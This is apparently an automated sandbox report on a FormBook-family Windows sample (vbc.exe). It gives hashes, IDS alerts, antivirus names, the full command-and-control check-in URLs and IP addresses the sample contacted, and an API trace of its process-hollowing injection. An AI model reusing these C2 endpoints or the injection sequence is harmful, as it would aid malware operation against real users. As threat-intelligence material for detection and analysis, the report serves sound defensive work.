popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

UPX Malicious Library PE File DLL OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 18, 2021, 7:43 a.m. Nov. 18, 2021, 8:39 a.m.
Size 475.9KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 cad43af39f983c31ad5579ea34a31457
SHA256 71d93edf8e5a5f7128dc660fa599a41c96059fee16983769adb91b3b8353294f
CRC32 57134A9A
ssdeep 6144:wGit1/F81/tr2OUz3sJilmqG5Uq+8mmcQVXtZVO:I/4aOSs3erNaa
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 156.240.151.190:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 156.240.151.190:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 156.240.151.190:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 154.23.202.51:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 50.87.195.38:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 50.87.195.38:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 50.87.195.38:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 154.23.202.51:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 154.23.202.51:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 194.195.211.26:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 194.195.211.26:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 194.195.211.26:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 185.104.45.81:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 185.104.45.81:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 185.104.45.81:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 45.128.51.67:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 45.128.51.67:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 45.128.51.67:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 45.128.51.67:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 103.90.234.17:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 103.90.234.17:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 103.90.234.17:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.oprimanumerodos.com/p0se/?AdhDQXr=xlYZ5X0oz3/WSnhnuO8VLYURni7dK5M/z3/1M5B1eWdqmk4yw0hlgYU/AWpZpglM84vVPpwr&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.mgav67.xyz/p0se/?AdhDQXr=HYHuyWMWS1fgLIUv7k1a3h0sjyQ2H8/HDVflvgP37+tigXoTURpSGq5OVapW4G89DO8EvEpq&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.bailios.com/p0se/?AdhDQXr=8oLSLrJeYc+K0ytzOJikqVU0igr6L5hpGSYkGAIomLt8RmfP6w1jUuRWukm53rjVgQXpPW5Y&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.teo-by.com/p0se/?AdhDQXr=FeJFAF+obH72CQbbPLarFy8KNhiLPhM71Jd9G4PYUxenhMp7DosU+Y1W6Wtf4fJWftA5N6Wd&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.attractivereviews.com/p0se/?AdhDQXr=ovk/jIrnGvNklwPKoDa/FgXcfy4LLp6cpdBpVVYi4PmHjc59s+hx7TQFj4PK4LVd8vVfURbY&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.bestexpecting.com/p0se/?AdhDQXr=aASfAAL76qMqqLN3P5FTu5qU9JswWMTr4/m2v90Be8FVcTL4yVaKxlDSmQkhSQbnDGJjdHVZ&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.seeklightandlogic.com/p0se/?AdhDQXr=v8eOpJ5pSZtRbrnsGw2QoU0Tcaab59HZDYF9JUKf6F2sNlVv9XFNl00F9pnyMp41hSNpW5ZC&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.sarasotacountysolar.com/p0se/?AdhDQXr=OYXzUVkbQBn87X4UVLPoQM44BgjEbFTY849uuOiCiLBhqJKfoUJue64IIPZ3m3EV1TLdLQTt&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.trungtambtx.com/p0se/?AdhDQXr=EN+pW9frennecAWJgD6Rqtphsaf+/pY6cu4GooIXx/aM/sJfkFY0WH3Frw9ZmW1T0AAd/bHA&pPU=EFQxUrRpC2Qh
suspicious_features GET method with no useragent header suspicious_request GET http://www.graylinkelectric.com/p0se/?AdhDQXr=TJBl9Xef33zqqB/TYYZ5Zr06Zjo1jum6QYq+egGPBuXzqcA7sn5bcltUsvWL9smVZn+gpIyw&pPU=EFQxUrRpC2Qh
request GET http://www.oprimanumerodos.com/p0se/?AdhDQXr=xlYZ5X0oz3/WSnhnuO8VLYURni7dK5M/z3/1M5B1eWdqmk4yw0hlgYU/AWpZpglM84vVPpwr&pPU=EFQxUrRpC2Qh
request GET http://www.mgav67.xyz/p0se/?AdhDQXr=HYHuyWMWS1fgLIUv7k1a3h0sjyQ2H8/HDVflvgP37+tigXoTURpSGq5OVapW4G89DO8EvEpq&pPU=EFQxUrRpC2Qh
request GET http://www.bailios.com/p0se/?AdhDQXr=8oLSLrJeYc+K0ytzOJikqVU0igr6L5hpGSYkGAIomLt8RmfP6w1jUuRWukm53rjVgQXpPW5Y&pPU=EFQxUrRpC2Qh
request GET http://www.teo-by.com/p0se/?AdhDQXr=FeJFAF+obH72CQbbPLarFy8KNhiLPhM71Jd9G4PYUxenhMp7DosU+Y1W6Wtf4fJWftA5N6Wd&pPU=EFQxUrRpC2Qh
request GET http://www.attractivereviews.com/p0se/?AdhDQXr=ovk/jIrnGvNklwPKoDa/FgXcfy4LLp6cpdBpVVYi4PmHjc59s+hx7TQFj4PK4LVd8vVfURbY&pPU=EFQxUrRpC2Qh
request GET http://www.bestexpecting.com/p0se/?AdhDQXr=aASfAAL76qMqqLN3P5FTu5qU9JswWMTr4/m2v90Be8FVcTL4yVaKxlDSmQkhSQbnDGJjdHVZ&pPU=EFQxUrRpC2Qh
request GET http://www.seeklightandlogic.com/p0se/?AdhDQXr=v8eOpJ5pSZtRbrnsGw2QoU0Tcaab59HZDYF9JUKf6F2sNlVv9XFNl00F9pnyMp41hSNpW5ZC&pPU=EFQxUrRpC2Qh
request GET http://www.sarasotacountysolar.com/p0se/?AdhDQXr=OYXzUVkbQBn87X4UVLPoQM44BgjEbFTY849uuOiCiLBhqJKfoUJue64IIPZ3m3EV1TLdLQTt&pPU=EFQxUrRpC2Qh
request GET http://www.trungtambtx.com/p0se/?AdhDQXr=EN+pW9frennecAWJgD6Rqtphsaf+/pY6cu4GooIXx/aM/sJfkFY0WH3Frw9ZmW1T0AAd/bHA&pPU=EFQxUrRpC2Qh
request GET http://www.graylinkelectric.com/p0se/?AdhDQXr=TJBl9Xef33zqqB/TYYZ5Zr06Zjo1jum6QYq+egGPBuXzqcA7sn5bcltUsvWL9smVZn+gpIyw&pPU=EFQxUrRpC2Qh
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2316
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73b95000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2436
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsw8B87.tmp\byggggnmiz.dll
file C:\Users\test22\AppData\Local\Temp\nsw8B87.tmp\byggggnmiz.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2436
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001f8
1 0 0
Process injection Process 2316 called NtSetContextThread to modify thread in remote process 2436
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1999372740
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314112
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 2436
1 0 0
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.NSISX.Spy.Gen.2
FireEye Trojan.NSISX.Spy.Gen.2
McAfee Artemis!CAD43AF39F98
Cybereason malicious.39f983
Cyren W32/Injector.APR.gen!Eldorado
Symantec Packed.Generic.606
ESET-NOD32 a variant of Win32/Injector.EQOA
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.NSISX.Spy.Gen.2
Avast FileRepMalware
Sophos Mal/Generic-R
McAfee-GW-Edition BehavesLike.Win32.Dropper.gc
Emsisoft Trojan.NSISX.Spy.Gen.2 (B)
Ikarus Trojan.NSIS.Agent
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Arcabit Zum.Androm.1
GData Zum.Androm.1
Cynet Malicious (score: 100)
MAX malware (ai score=83)
Malwarebytes Trojan.Injector
APEX Malicious
SentinelOne Static AI - Suspicious PE
Fortinet W32/Injector.APR!tr
AVG FileRepMalware
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2440
thread_handle: 0x000001fc
process_identifier: 2436
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001f8
1 1 0

NtGetContextThread

 thread_handle: 0x000001fc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2436
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001f8
1 0 0

NtSetContextThread

 registers.eip: 1999372740
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314112
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001fc
process_identifier: 2436
1 0 0